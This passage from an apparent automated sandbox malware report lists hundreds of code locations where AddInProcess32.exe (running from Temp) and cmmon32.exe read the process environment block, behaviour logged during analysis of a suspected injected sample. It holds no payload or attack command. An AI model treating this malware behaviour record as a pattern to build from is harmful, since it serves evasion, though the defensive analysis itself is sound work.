          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01828A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01815210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01815210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01815210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01815210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0181AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0181AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01833A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0181E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01854A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01854A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018CFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01819240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01819240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01819240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01819240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01827E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01827E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01827E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01827E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01827E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01827E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018DAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018DAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018DEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018A4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0182766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0183AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0183AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0183AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0183AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0183AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0185927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EA14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E66CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E66CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E66CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DE58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E7B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E7B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E7B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E7B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E7B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E7B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EB8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DF849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E290AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DE9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E1F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E1F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E1F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E63884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E63884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E0746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EA2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EB1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E1A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E00050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E00050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E7C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E7C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E1BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EB740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EB740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EB740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E66C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E66C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E66C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E66C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E67016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E67016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E67016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EB4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EB4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E741E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E98DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E66DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DEB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DEB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DEB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DFD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DFD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E135A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E669A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E11DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E11DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E11DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E12581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E12581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E12581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E12581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E0C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E1A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E12990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E1FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E1FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E0C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E0C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E23D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E0B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E0B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E63540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DEB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DEB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E07D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DEC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E04120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E04120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E04120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E04120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E04120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E6A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E14D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E14D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E14D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E1513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E1513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DE9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DE9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DE9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EB8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DEAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E116E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E12AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E28EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E9FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E12ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E136CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EB8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DF76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E646A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EB0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EB0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EB0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E1FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E7FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DFAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DFAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E1D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E1D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E9B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E9B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EB8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E0AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E0AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E0AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E0AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E0AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E2927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E74257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DF766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DEAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DEAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E24A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E24A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DE5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DE5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DE5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DE5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DF8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E9FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DEC600 mov eax, dword ptr fs:[00000030h]
